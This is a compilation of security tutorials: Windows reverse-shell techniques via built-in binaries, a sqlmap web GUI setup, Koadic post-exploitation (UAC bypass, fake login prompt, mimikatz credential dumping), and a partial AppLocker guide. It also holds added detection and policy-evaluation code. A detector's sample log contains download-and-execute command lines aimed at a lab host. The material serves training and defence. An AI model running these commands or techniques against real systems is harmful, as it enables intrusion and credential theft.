Get Reverse-shell via Windows one-liner

This article is aimed at those who play CTF challenges: it collects Windows one-liners that abuse built-in binaries such as powershell.exe and rundll32.exe to obtain a reverse shell from a Windows host. While attacking HTTP services or other programs we often end up with a remote code execution (RCE) vulnerability, i.e. the ability to run arbitrary system commands on the target. The list below contains Windows commands that turn such a foothold into a reverse connection back to the attacker.

Table of Content

Mshta.exe

  • Launch HTA attack via HTA Web Server of Metasploit

Rundll32.exe

  • Launch Rundll32 Attack via SMB Delivery of Metasploit

Regsvr32.exe

  • Launch Regsvr32 via Script Web Delivery of Metasploit

Certutil.exe

  • Launch certutil Attack via Msfvenom

Powershell.exe

  • Launch Powercat attack via Powershell
  • Launch Batch File Attack via Powershell
  • Launch cscript.exe via Powershell

Msiexec.exe

  • Launch msiexec attack via msfvenom

Wmic.exe

  • Launch Wmic.exe attack via Koadic

Mshta.exe

Mshta.exe is the Microsoft HTML Application Host, the Windows utility responsible for running HTA (HTML Application) files. An HTA is an HTML document that may embed JScript or VBScript; mshta.exe interprets such files and runs the embedded script with the privileges of the user who launched it.

Metasploit contains an “HTA Web Server” module (exploit/windows/misc/hta_server) that generates a malicious .hta file. The module hosts an HTML Application which, when opened, runs a payload via PowerShell. When a user navigates to the HTA file they are prompted by Internet Explorer twice before the payload executes.

Now run the malicious HTA through mshta.exe on the victim’s machine (vulnerable to RCE) to obtain a meterpreter session.

Once you execute the malicious .hta file on the remote machine with the help of mshta.exe, you get a reverse connection at your local machine (Kali Linux).

As you can observe, we have a meterpreter session of the victim, as shown below:

Rundll32.exe

Rundll32.exe is a Windows utility that loads a DLL and calls a function it exports (originally either 16-bit or 32-bit libraries). Because it takes an ordinary path argument, it will also load a DLL from a UNC path, such as an attacker-controlled SMB share.

Launch Rundll32 Attack via SMB Delivery of Metasploit

Metasploit also contains an “SMB Delivery” module (exploit/windows/smb/smb_delivery) that generates a malicious DLL. The module serves payloads from an SMB server and prints the commands needed to retrieve and execute them; it currently supports DLLs and PowerShell.

Now run the malicious DLL through rundll32.exe on the victim machine (vulnerable to RCE) to obtain a meterpreter session.

Once you execute the DLL on the remote machine with the help of rundll32.exe (it is loaded straight from the SMB share the module hosts), you get a reverse connection at your local machine (Kali Linux).

As you can observe, we have a meterpreter session of the victim, as shown below:

Regsvr32.exe

Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows.

RegSvr32.exe has the following command-line options:

Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname>

/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes

Launch Regsvr32 via Script Web Delivery of Metasploit

This module (exploit/multi/script/web_delivery) quickly fires up a web server that serves a payload and prints a command which downloads and executes it. It does so either through the chosen scripting-language interpreter or through the “squiblydoo” technique via regsvr32.exe, which bypasses application whitelisting. The main purpose of the module is to quickly establish a session on a target when the attacker has to type the command in manually, e.g. through command injection.

Regsvr32 uses the “squiblydoo” technique for bypassing application whitelisting: the signed Microsoft binary regsvr32.exe is told (via the /i: switch and scrobj.dll) to fetch an .sct scriptlet, and it executes the PowerShell command embedded in that file. Both web requests (the .sct file and the PowerShell download/execute) can occur on the same port. The “PSH (Binary)” target writes a file to disk, allowing custom binaries to be served up to be downloaded and executed.

Copy the command highlighted in the window below and run it on the target.

Once regsvr32.exe loads scrobj.dll on the remote machine and fetches the .sct from the module’s web server, you get a reverse connection at your local machine (Kali Linux).

As you can observe, we have a meterpreter session of the victim, as shown below:

Certutil.exe

Certutil.exe is a command-line program installed as part of Certificate Services. Among its options is a URL cache function that fetches a file over HTTP, which lets us drop our malicious executable on the target machine and then run it to get a meterpreter session.

Launch certutil Attack via Msfvenom

Generate a malicious executable (.exe) file with msfvenom and start multi/handler to catch the reverse shell from the victim’s machine.

Now use certutil’s URL cache function to download shell.exe onto the target and then run the downloaded file. The -urlcache -split -f options tell certutil to fetch the URL and save it to a local file rather than only caching it; the syntax is:

certutil.exe -urlcache -split -f <URL of shell.exe> <local file name>

As you can observe, we have a meterpreter session of the victim, as shown below:

Powershell.exe

You can use PowerShell.exe to start a PowerShell session from the command line of another tool, such as cmd.exe, or use it at the PowerShell prompt to start a new session. Read more in Microsoft’s official documentation for PowerShell.exe.

Launch Powercat attack via Powershell

Powercat is a PowerShell-native backdoor listener and reverse shell, often described as a PowerShell version of netcat. On top of netcat’s features it has integrated generation of encoded payloads (the sort of thing msfvenom does) and a client-to-client relay, i.e. a Powercat client that connects two separate listeners to each other.

Download powercat.ps1 to your local machine, serve it with a Python HTTP server and start a netcat listener; the target will fetch the script from that server, as shown below.

Then execute the following command on the remote side to get a netcat session.

As you can observe, we have a netcat session of the victim, as shown below:

Batch File

Similarly, PowerShell lets the client run a batch file, so let’s generate a malicious .bat file with msfvenom as given below and start a netcat listener.

Then execute the following command on the remote side to get a netcat session.

As you can observe, we have a netcat session of the victim, as shown below:

Cscript

Similarly, PowerShell can launch cscript.exe, which runs .wsf, .js and .vbs scripts (it cannot run a .bat file), so let’s generate a malicious script in one of those formats with msfvenom as given below and start multi/handler as the listener.

Then execute the following command on the remote side to get a meterpreter session.

As you can observe, we have a meterpreter session of the victim, as shown below:

Msiexec.exe

As we all know, Windows ships with the Windows Installer engine, which MSI packages use to install applications. The executable program that interprets packages and installs products is Msiexec.exe.

Launch msiexec attack via msfvenom

Let’s generate an MSI package (1.msi) carrying the Windows Meterpreter payload as follows and start multi/handler as the listener.

Once you run 1.msi on the remote machine with the help of msiexec (a quiet install straight from a URL needs no user interaction), you get a reverse connection at your local machine (Kali Linux).

As you can observe, we have a meterpreter session of the victim, as shown below:

Wmic.exe

The WMIC utility is Microsoft’s WMI command-line interface, used for a variety of administrative tasks on local and remote machines: WMI queries for system settings, stopping processes, and running scripts locally or remotely. Its /format switch accepts an XSL (eXtensible Stylesheet Language) stylesheet, including one fetched from a URL, and because XSL can embed script this is enough to execute attacker-supplied code.

Launch Wmic.exe attack via Koadic

Now we will generate a malicious XSL file with the help of Koadic, a Command & Control tool that is quite similar to Metasploit and PowerShell Empire.

To know how koadic works, read our article from here: https://www.hackingarticles.in/koadic-com-command-control-framework/

Once installation has completed, run ./koadic to start Koadic, load the stager/js/wmic stager with the following command and set SRVHOST to the address the stager should call home to.

Run the following WMIC command on the target to download and run the malicious XSL file from the remote server:

Once the malicious XSL file has executed on the target machine you will have a zombie connection, just like a Metasploit session.
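The one-liners above share a handful of tell-tale arguments: a URL or UNC path handed to a signed binary, certutil’s -urlcache, regsvr32’s /i: together with scrobj.dll, msiexec’s /i pointing at a URL, wmic’s /format: pointing at a remote stylesheet, and PowerShell’s download cradles. The Python below is an added example, not part of the original article, showing how a defender classifies process-creation command lines against those patterns while leaving legitimate uses of the same binaries alone. The log lines, host name, user names and the 192.168.1.109 address are constructed for the example.

```python
"""Classify Windows process-creation command lines against the one-liner
patterns discussed above (mshta, rundll32, regsvr32, certutil, msiexec,
wmic, powershell).  Added example; the sample log lines are constructed."""
import re
from typing import List, Optional, Tuple

# (name, regex over the full command line, description).  Lookaheads make the
# argument order irrelevant; the benign uses of the same binaries in
# SAMPLE_LOG must NOT match.
SIGNATURES = [
    ("mshta_remote_hta",
     r"\bmshta(\.exe)?\b.*?(https?:|\\\\)",
     "mshta.exe running an HTA from a URL or UNC path"),
    ("rundll32_smb_dll",
     r"\brundll32(\.exe)?\b\s+\\\\\S+\.dll",
     "rundll32.exe loading a DLL from an SMB share"),
    ("regsvr32_squiblydoo",
     r"\bregsvr32(\.exe)?\b(?=.*?/i:https?:)(?=.*?scrobj\.dll)",
     "regsvr32.exe fetching a remote .sct through scrobj.dll"),
    ("certutil_download",
     r"\bcertutil(\.exe)?\b(?=.*?-urlcache)(?=.*?https?:)",
     "certutil.exe used as a downloader (-urlcache -split -f)"),
    ("msiexec_remote_package",
     r"\bmsiexec(\.exe)?\b(?=.*?/i\s+https?:)",
     "msiexec.exe installing a package straight from a URL"),
    ("wmic_remote_xsl",
     r'\bwmic(\.exe)?\b(?=.*?/format:\s*"?https?:)',
     "wmic.exe loading a remote XSL stylesheet"),
    ("powershell_download_cradle",
     r"\bpowershell(\.exe)?\b(?=.*?(downloadstring|downloadfile|"
     r"invoke-webrequest|net\.webclient))",
     "PowerShell download cradle"),
]
COMPILED = [(n, re.compile(rx, re.IGNORECASE), d) for n, rx, d in SIGNATURES]


def classify(command_line: str) -> Optional[Tuple[str, str]]:
    """Return (signature name, description) for the first matching pattern."""
    for name, regex, desc in COMPILED:
        if regex.search(command_line):
            return name, desc
    return None


def parse_log_line(line: str) -> Tuple[str, str]:
    """Split a constructed 'timestamp host user CommandLine=...' record."""
    meta, _, cmd = line.partition(" CommandLine=")
    return meta, cmd.strip()


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (meta, signature name, command line) for every suspicious record."""
    hits = []
    for line in lines:
        meta, cmd = parse_log_line(line)
        verdict = classify(cmd)
        if verdict:
            hits.append((meta, verdict[0], cmd))
    return hits


# Constructed process-creation records (Sysmon event 1 / 4688 style), not real
# telemetry.  192.168.1.109 stands in for the attacker's Kali machine.
SAMPLE_LOG = [
    r"2019-08-05T10:00:01Z WS01 CORP\bob CommandLine=mshta http://192.168.1.109:8080/sales.hta",
    r"2019-08-05T10:00:02Z WS01 CORP\bob CommandLine=rundll32.exe \\192.168.1.109\share\test.dll,0",
    r"2019-08-05T10:00:03Z WS01 CORP\bob CommandLine=regsvr32 /s /n /u /i:http://192.168.1.109:8080/payload.sct scrobj.dll",
    r"2019-08-05T10:00:04Z WS01 CORP\bob CommandLine=certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe",
    r"2019-08-05T10:00:05Z WS01 CORP\bob CommandLine=msiexec /q /i http://192.168.1.109/1.msi",
    r'2019-08-05T10:00:06Z WS01 CORP\bob CommandLine=wmic os get /format:"http://192.168.1.109:9999/stager.xsl"',
    r"2019-08-05T10:00:07Z WS01 CORP\bob CommandLine=powershell -c IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1')",
    # Legitimate uses of the same binaries: these must stay quiet.
    r"2019-08-05T10:01:01Z WS01 CORP\bob CommandLine=certutil -hashfile C:\Windows\System32\notepad.exe SHA256",
    r"2019-08-05T10:01:02Z WS01 CORP\bob CommandLine=rundll32.exe shell32.dll,Control_RunDLL",
    r"2019-08-05T10:01:03Z WS01 SYSTEM CommandLine=regsvr32 /s C:\Windows\System32\msxml3.dll",
    r"2019-08-05T10:01:04Z WS01 CORP\bob CommandLine=msiexec /i C:\Users\bob\Downloads\setup.msi /qn",
]

if __name__ == "__main__":
    for meta, sig, cmd in scan(SAMPLE_LOG):
        print(f"{meta}  [{sig}]  {cmd}")
```

The lookahead-based signatures are deliberately narrow: a local HTA, a DLL registered from System32, or an MSI installed from a local path does not trigger, so the check can run over all process-creation events without drowning in noise. Anything that needs a remote resource to be pulled by one of these binaries is what the one-liners above rely on, and that is what gets flagged.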

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Configure Sqlmap for WEB-GUI in Kali Linux

Hello everyone and welcome to this tutorial on setting up sqlmap with a web GUI. Web GUI simply refers to an interface that a browser provides over HTTP/HTTPS.

sqlmap is the most popular tool for automating SQL injection attacks against vulnerable sites, whether the injection is error based, boolean or time based blind, UNION based or stacked; it supports many database back ends, not only MySQL. Fewer people know that sqlmap also ships an API server (sqlmapapi.py), written in Python, that can be used to build a front end for the command-line tool.

One such person is Hood3dRob1n (https://github.com/Hood3dRob1n/SQLMAP-Web-GUI), who has created a PHP-based front end for sqlmap, and today we’ll set it up on Kali Linux. Needless to say, it will work on any Linux distribution.

Let’s get started.

Table of Contents:

  1. Cloning the github repository and giving necessary permissions
  2. Locating and hosting the API
  3. Launching the front end
  4. Attacking practice lab for SQLi

Cloning the github repository

First, we need to clone the Hood3dRob1n repository. To clone, we’ll use the git clone command and put the folder named sqlmap inside “/var/www/html.”


Locating and hosting the API

The next step is to start an Apache server. If you don’t have Apache pre-installed, you can install it with apt-get install apache2.

After the Apache server is up, we need to run sqlmapapi.

Its default location varies between Linux distributions, so we used the locate command to find the file named “sqlmapapi.py”.

We need to run this API in server mode (sqlmapapi.py with its -s switch, which by default listens on 127.0.0.1:8775) using the command:

Launching the front end

If you have followed this tutorial so far, you’ll see the following screen when you open localhost/sqlmap

And voila! Just like that you are good to start injecting SQL queries.
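Hood3dRob1n’s PHP front end, like any web GUI for sqlmap, is a thin client over the JSON REST interface that sqlmapapi.py exposes (task/new, option/set, scan/start, scan/status, scan/data, task/delete). The Python client below is an added example, not part of this tutorial or of the GUI’s own code: it drives those same endpoints with the options the tutorial selects (current user, current database, hostname, error-based technique). The transport is a plain callable so the client can run offline against FakeSqlmapApi, a constructed stand-in that answers with canned replies; the lab URL mirrors the 192.168.1.105 host used below and is an assumption.

```python
"""Minimal client for sqlmap's REST API (sqlmapapi.py -s, default
127.0.0.1:8775), the interface a web GUI front end talks to.  Added example;
FakeSqlmapApi and the lab URL are constructed for offline use."""
import json
import time
import urllib.request
from typing import Any, Callable, Dict, List, Optional

# transport(method, url, json_body_or_None) -> decoded JSON reply
Transport = Callable[[str, str, Optional[Dict[str, Any]]], Dict[str, Any]]


def urllib_transport(method: str, url: str, body: Optional[Dict[str, Any]]) -> Dict[str, Any]:
    """Real HTTP transport for a running sqlmapapi server."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.loads(resp.read().decode())


class SqlmapClient:
    def __init__(self, base: str = "http://127.0.0.1:8775",
                 transport: Transport = urllib_transport) -> None:
        self.base = base.rstrip("/")
        self.http = transport

    def _call(self, method: str, path: str, body: Optional[dict] = None) -> dict:
        reply = self.http(method, self.base + path, body)
        if not reply.get("success"):
            raise RuntimeError(f"{method} {path}: {reply.get('message', 'failed')}")
        return reply

    def run_scan(self, url: str, options: Dict[str, Any], poll: float = 1.0) -> List[dict]:
        """Create a task, set options, start the scan, wait, return its data."""
        taskid = self._call("GET", "/task/new")["taskid"]
        try:
            self._call("POST", f"/option/set/{taskid}", options)
            self._call("POST", f"/scan/{taskid}/start", {"url": url})
            while self._call("GET", f"/scan/{taskid}/status")["status"] != "terminated":
                time.sleep(poll)
            return self._call("GET", f"/scan/{taskid}/data")["data"]
        finally:
            self._call("GET", f"/task/{taskid}/delete")  # never leave tasks behind


class FakeSqlmapApi:
    """Constructed offline stand-in: records every call, answers like sqlmapapi."""
    def __init__(self) -> None:
        self.calls: List[tuple] = []
        self.status_polls = 0

    def __call__(self, method: str, url: str, body: Optional[dict]) -> dict:
        path = url.split("/", 3)[3]            # drop scheme://host:port
        self.calls.append((method, path, body))
        if path == "task/new":
            return {"success": True, "taskid": "constructedtask01"}
        if path.endswith("/status"):
            self.status_polls += 1             # first poll: still running
            status = "running" if self.status_polls < 2 else "terminated"
            return {"success": True, "status": status, "returncode": 0}
        if path.endswith("/data"):
            return {"success": True, "error": [],
                    "data": [{"type": 1, "status": 1, "value": "security"}]}
        if path.endswith("/start"):
            return {"success": True, "engineid": 4242}
        return {"success": True}


# Options mirroring the tutorial's enumeration choices (real sqlmap option names).
LAB_OPTIONS = {"getCurrentUser": True, "getCurrentDb": True,
               "getHostname": True, "technique": "E"}


def demo() -> tuple:
    """Run the whole exchange against the fake server; return (data, call paths)."""
    fake = FakeSqlmapApi()
    data = SqlmapClient(transport=fake).run_scan(
        "http://192.168.1.105/sqli/Less-1/?id=1", LAB_OPTIONS, poll=0)
    return data, [c[1] for c in fake.calls]


if __name__ == "__main__":
    data, calls = demo()
    print("\n".join(calls))
    print(json.dumps(data, indent=2))
```

Point SqlmapClient at a real sqlmapapi (keep the default urllib_transport) and run_scan performs exactly the same sequence the browser GUI does when you click “run”; the try/finally makes sure the task is deleted even when the scan fails, which matters because a long-running API server otherwise accumulates abandoned tasks.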

Attacking practice lab for SQLi

There are 6 tabs essentially here.

  • BASIC: This tab allows you to set the URL to test SQL injections. You can set HTTP method too. Given options are POST, PUT, HEAD etc.
  • REQUEST: Allows you to modify your request with optional parameters like time delay, timeout between requests, no. of retries to connect, user agent etc.
  • INJECTION & TECHNIQUE: Lets you choose which kind of injection and which techniques to apply (boolean based, error based, inline queries, etc.) as well as other options such as using DBMS hex functions for data retrieval, the kind of database (MySQL, MSSQL, ...) and so on.
  • DETECTION: To set a custom string to match.
  • ENUMERATION: What data to retrieve. Eg: current user and current database dump. Or if you are feeling fancy, all users all data dump. You can play around with it.
  • ACCESS: Access parameters. Leave this at default if you don’t know your way around it.

We will set the parameters one by one as we proceed. But we never attack on live websites, hence, we used another PC with an IP address of 192.168.1.105 to host a practice lab for SQL injection attacks called SQL-Dhakkan. Refer to this article to know how you can set it up yourself!

If you set up the lab successfully, you’ll get a screen like this:

I am on Lesson 1 currently and I know that id=1 has an error based SQLi vulnerability. So, let’s copy this URL to our web-gui sqlmap.

It is highly recommended that you get yourself familiar with HTTP methods and read how to manually attack SQLi here because it will give you a profound idea of the options we will be selecting further in the tutorial. But if you wish to continue with the tutorial instead, who am I to stop you!

Go to the enumeration tab and select the methods that you want to test.

Once set, set the type of SQLi you want to perform.

Once you are satisfied with the choices you input, run the scan!

For the purpose of this tutorial we have performed a really basic scan that tells us the current database and hostname, but you can play around with the parameters as you like.

Conclusion: Web based GUI for sqlmap is definitely a plus point over the traditional sqlmap for many reasons, one of them being the ease of access. There is no need to remember such long commands. Drag, drop and done!

Plus, web-based GUI is nothing but a web app for you. A web app that runs sqlmap, isn’t it great?

Hope you enjoyed this little tutorial.

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker. contact here

Koadic – COM Command & Control Framework

Hello friends!! In this article we are introducing another very interesting tool, “KOADIC – COM Command & Control”, which is quite similar to Metasploit and PowerShell Empire. So let’s begin with its tutorial and check its functionality.

Table of Content

  • Introduction to Koadic
  • Installation of Koadic
  • Usage of Koadic
  • Koadic Stagers
  • Privilege Escalation with Koadic Implants
  • Post Exploitation
    • Generate Fake Login Prompt
    • Enable Rdesktop
    • Inject Mimikatz
    • Execute Command
    • Obtain Meterpreter Session from Zombie Session

Introduction to Koadic

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.

It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).

Koadic also attempts to be compatible with both Python 2 and Python 3. However, as Python 2 will be going out the door in the not-too-distant future, we recommend using Python 3 for the best experience.

Source – https://github.com/zerosum0x0/koadic

Installation of Koadic

It must first be downloaded and installed before you can start using Koadic. Run the following commands to download Koadic from GitHub, then install its Python dependencies as described in the repository’s README.

git clone https://github.com/zerosum0x0/koadic.git

cd koadic

Usage of Koadic

The tool is built around stagers and implants: at the time of writing it contains 6 stagers and 41 implants.

Stager: Stagers hook target zombies and allow you to use implants.

Implants: Implants start jobs on zombies.

Once installation has completed, run ./koadic to start Koadic. The most helpful command for a synopsis of its use is help, which summarizes the available commands. Koadic functions much like other frameworks such as Metasploit.

To list every available module in the terminal, type “use” followed by <tab> <tab>. This dumps all available implants and stagers; you can also explore the stager modules with the following commands:

This will give you all the stagers that can be used to obtain a zombie session on the target machine.

Koadic Stagers

The stager defines where any zombie device reaches the Koadic command and control. Its settings can be viewed by running the info command once the module is selected. Let’s start by loading the mshta stager with the following command.

Set SRVHOST to the address the stager should call home to and SRVPORT to the port to listen on; you can also set ENDPOINT to choose the name of the malicious file. Then enter run to execute.

Now wait for the victim to run the command below, which executes the generated malicious file.

Once the malicious file has executed on the target machine you will have a zombie connection, just like a Metasploit session.

Privilege Escalation with Koadic Implants

Once you have a zombie session you can use implant modules for privilege escalation, including the bypassuac implants.

Koadic contains modules to bypass UAC on Windows 7, 8 and 10, so that you can obtain a high-integrity session and extract system-level information. We can load such a module by running the command below within Koadic.

Then we set the payload value to run the module. You can keep the default zombie value “ALL” to attack every zombie, or set the particular zombie id you want to attack. Use the commands below to adjust the payload value and the zombie.

Post Exploitation

Generate Fake Login Prompt

You can start a phishing attack with koadic and track the victim’s login credentials. We can load this module by running the command below within Koadic.

This launches a login prompt on the victim’s machine.

If the victim enters his password into the fake prompt, the password arrives in Koadic’s command and control.

Enable Rdesktop

Just like Metasploit, here too you can enable the Remote Desktop service on the victim’s machine with the following implant module.

As you can observe in the image below, job 4 completed successfully and the Remote Desktop service has been enabled.

We can confirm this with nmap by checking the state of port 3389.

As the nmap result shows, port 3389 is open, which means the Remote Desktop service is enabled.

Inject Mimikatz

This implant injects mimikatz into the victim’s machine to extract credentials from memory. We can load the module by running the command below within Koadic.

As a result it dumps the NT (“NTLM”) password hashes, which we need to crack. Save the hash value in a text file.

Then we use John the Ripper to crack the hash, running the following command against the hash file (with the NT hash format selected), as shown below:

As you can observe, it recovered 123 as the password from the hash file.

Execute Command

Since we now have a high-privileged shell we are free to run any post-exploitation implant, so here we use exec_cmd to execute arbitrary commands on the Windows system. To load this implant, run the command given below.

Then we set the CMD value to the command to run, together with the zombie id.

Obtain Meterprter Session from Zombie Session

If you have a zombie session you can obtain a meterpreter session through it. Generate a malicious file with the help of msfvenom and start multi/handler, as we always do in Metasploit.

Koadic provides an implant module that lets you upload any file to the victim’s machine once you have a zombie session. To load this implant, run the following command:

Now set the file location and the zombie id, then run the module. This uploads your malicious file into a writable directory, i.e. %TEMP%.

Once the job has completed, use exec_cmd again to run the uploaded file.

Then set the CMD value to the uploaded shell.exe file, together with the zombie id.

Once the malicious exe has executed within the Koadic zombie session, you get a meterpreter session in the Metasploit framework, as shown below:

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Windows Applocker Policy – A Beginner’s Guide

Hello Friends!! This article covers the Microsoft Windows AppLocker policy. It is aimed at system administrators and explains the AppLocker rules used in application control policies and how to work with them.

Table of Content

Introduction to Applocker

  • What is applocker Policy?
  • Who Should Use AppLocker?
  • What can your rules be based upon?

Configure the Applocker to Allow/Deny Execution of an App

  • Configure Enforcement rule
  • Create Default Rules

Modify Executable Default Rules to Allow an App

  • Rule conditions
    • Publisher
    • Path
    • File Hash

Modify Windows Installer Default Rules to Allow an App

Modify Script Default Rules to Allow an App

Creating New Rules to Block an APP

Introduction to Applocker

What is applocker Policy?

Windows AppLocker is a feature introduced in Windows 7 and Windows Server 2008 R2 to restrict the use of unwanted programs. It lets administrators control which executable files are allowed or denied to run. With this policy, administrators can generate rules based on file attributes such as publisher, path or file hash, and specify which users or groups may execute those applications.

What can your rules be based upon?

The AppLocker console is organized into rule collections: executable files, scripts, Windows Installer files, packaged apps and packaged app installers, and DLL files. These collections let you easily distinguish the rules for different application types. The file formats included in each rule collection are: executable rules cover .exe and .com; script rules cover .ps1, .bat, .cmd, .vbs and .js; Windows Installer rules cover .msi, .msp and .mst; packaged app rules cover .appx; and DLL rules cover .dll and .ocx.

Who Should Use AppLocker?

AppLocker is worthwhile for organizations that have to accomplish any of the following:

  • Control which applications are allowed to run inside the company.
  • Control which users are allowed to run licensed programs.
  • Provide an audit log of which programs users have been running.
  • Prevent standard users from installing per-user software.

Configure the Applocker to Allow/Deny Execution of an App

In the Group Policy Object Editor at Computer Configuration > Windows Settings > Security Settings > Application Control Policies > AppLocker, the Windows AppLocker settings exist.

Configure Enforcement Rule

Use the enforcement setting for each collection to choose between Enforce rules (rules are enforced for the rule collection and all events are audited) and Audit only (events are logged but nothing is blocked).

  1. Select the Configured check box for the rule collection that you are editing, and then verify that Enforce rules is selected.
  2. Click OK.

Open the Advanced tab and enable the DLL rule collection.

Create Default Rules

AppLocker includes default rules for each rule collection. These rules are intended to help ensure that the files that are required for Windows to operate properly are allowed in an AppLocker rule collection.

  • Open the AppLocker console.
  • Right-click the rule type for which you want to generate default rules automatically. You can automatically create executable rules, Windows Installer rules, script rules and packaged app rules.
  • Click Create Default Rules.

Executable Default Rule Types Include:

  • Allow members of the local Administrators group to run all apps.
  • Allow members of the Everyone group to run apps that are located in the Windows folder.
  • Allow members of the Everyone group to run apps that are located in the Program Files folder.

Modify Executable Default Rules to Allow an App

A rule can be configured to use allow or deny actions:

  • ALLOW : You can specify which files are allowed to run in your environment, and for which users or groups of users.
  • DENY : You can specify which files are not allowed to run in your environment, and for which users or groups of users.

Once you have created the default rules as above, you can modify them to suit your requirements. For example, if you want to modify the rule “Allow members of the Everyone group to run apps that are located in the Program Files folder” so that a specific user or group may run a specific program, open its properties by right-clicking the rule and follow the steps below.

Select the file or folder path that this rule should affect. The asterisk (*) can be used as a wildcard in path rules. For example, %ProgramFiles%\* covers all files and subfolders within that path.

Rule conditions

Rule conditions are the criteria AppLocker uses to identify the applications a rule applies to. The three primary conditions are publisher, path and file hash.

Publisher

Identifies an application by its digital signature. The signature carries information about the company (the publisher) that created the application.

Wildcard characters can be used in the publisher rule fields; the exact specifications are listed under the Windows Installer rules below.

Advantage:

Frequent updating is not required.

You can apply different values within a certificate.

You can use a single rule to allow a complete product suite.

Within the publisher rule, you can use the asterisk (*) wildcard character to specify that any value should match.

Disadvantage:

While a single rule can be used to allow a complete product suite, all files in the suite must be uniformly signed.

Path

Identify an app in the computer file system or on the network by its location. For well-known paths such as Program Files and Windows, AppLocker uses custom path variables.

Advantages:

Many folders or a single file can be easily controlled.

The asterisk (*) can be used as a wildcard in the rules of the path. For example, %ProgramFiles%\Microsoft Office\* indicates that all files and subfolders within the Microsoft Office folder will be affected by the rule.

Disadvantage:

A rule that allows a folder path is risky if that folder holds subfolders writable by a standard user: the user can drop an executable there and it will match the allow rule.

File Hash

Identifies a file by a cryptographic hash (SHA-256) computed over its contents. For files that are not digitally signed, file hash rules are safer than path rules.

Advantage:

Since each file has a unique hash, a file hash condition only applies to one file.

Disadvantage:

Whenever the file is updated (such as security updates or upgrades), the hash of the file changes. Consequently, you have to manually update the rules for file hash.
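To see how these conditions combine at run time, the Python below is an added example (not Microsoft’s implementation) that evaluates path rules from an AppLocker policy XML the way the Exe collection does: a rule only applies to a user holding its SID, an explicit Deny wins over any Allow, an Exception carves a path out of a rule, and a file that matches nothing is blocked when the collection is enforced. The policy is constructed from the three executable default rules discussed above plus a Deny rule for cmd.exe and two exceptions for %WINDIR%\Tasks and %WINDIR%\Temp, subfolders that standard users can write to on a default installation (the path-rule disadvantage just described). The rule Ids, the SID lists and the file paths are assumptions; publisher and file hash rules are not modelled.

```python
"""Evaluate AppLocker FilePathRule entries from a policy XML.  Added example;
the policy, rule Ids and test paths are constructed.  Publisher and file
hash rules are not modelled."""
import re
import xml.etree.ElementTree as ET
from typing import Iterable, List, Tuple

# AppLocker path variables and the locations they stand for on a default install.
PATH_VARIABLES = {
    "%WINDIR%": [r"C:\Windows"],
    "%SYSTEM32%": [r"C:\Windows\System32"],
    "%OSDRIVE%": ["C:"],
    "%PROGRAMFILES%": [r"C:\Program Files", r"C:\Program Files (x86)"],
}
EVERYONE, ADMINISTRATORS = "S-1-1-0", "S-1-5-32-544"


def _expand(pattern: str) -> List[str]:
    for var, roots in PATH_VARIABLES.items():
        if pattern.upper().startswith(var):
            return [root + pattern[len(var):] for root in roots]
    return [pattern]


def path_matches(pattern: str, path: str) -> bool:
    """Path conditions are case-insensitive; '*' matches any run of characters."""
    for expanded in _expand(pattern):
        regex = "^" + ".*".join(re.escape(p) for p in expanded.split("*")) + "$"
        if re.match(regex, path, re.IGNORECASE):
            return True
    return False


def evaluate(policy_xml: str, collection: str, path: str,
             user_sids: Iterable[str]) -> Tuple[str, bool]:
    """Return (decision, enforced).  Deny beats Allow; no match means Deny."""
    root = ET.fromstring(policy_xml.strip())
    coll = root.find(f"RuleCollection[@Type='{collection}']")
    if coll is None:                      # collection not configured at all
        return "Allow", False
    enforced = coll.get("EnforcementMode") == "Enabled"
    sids = {s.upper() for s in user_sids}
    allowed = False
    for rule in coll.findall("FilePathRule"):
        if rule.get("UserOrGroupSid", "").upper() not in sids:
            continue
        conditions = [c.get("Path") for c in rule.findall("Conditions/FilePathCondition")]
        exceptions = [e.get("Path") for e in rule.findall("Exceptions/FilePathCondition")]
        if not any(path_matches(c, path) for c in conditions):
            continue
        if any(path_matches(e, path) for e in exceptions):
            continue                      # carved out of this rule
        if rule.get("Action") == "Deny":
            return "Deny", enforced       # explicit deny wins immediately
        allowed = True
    return ("Allow" if allowed else "Deny"), enforced


# Constructed policy: the three executable default rules, exceptions for two
# user-writable Windows subfolders, and the cmd.exe deny rule from the text
# expressed as a path rule.  Ids are placeholders, not real GUIDs.
POLICY = r"""
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="rule-programfiles" Name="(Default Rule) All files located in the Program Files folder"
                  UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*"/></Conditions>
    </FilePathRule>
    <FilePathRule Id="rule-windir" Name="(Default Rule) All files located in the Windows folder"
                  UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*"/></Conditions>
      <Exceptions>
        <FilePathCondition Path="%WINDIR%\Tasks\*"/>
        <FilePathCondition Path="%WINDIR%\Temp\*"/>
      </Exceptions>
    </FilePathRule>
    <FilePathRule Id="rule-admins" Name="(Default Rule) All files"
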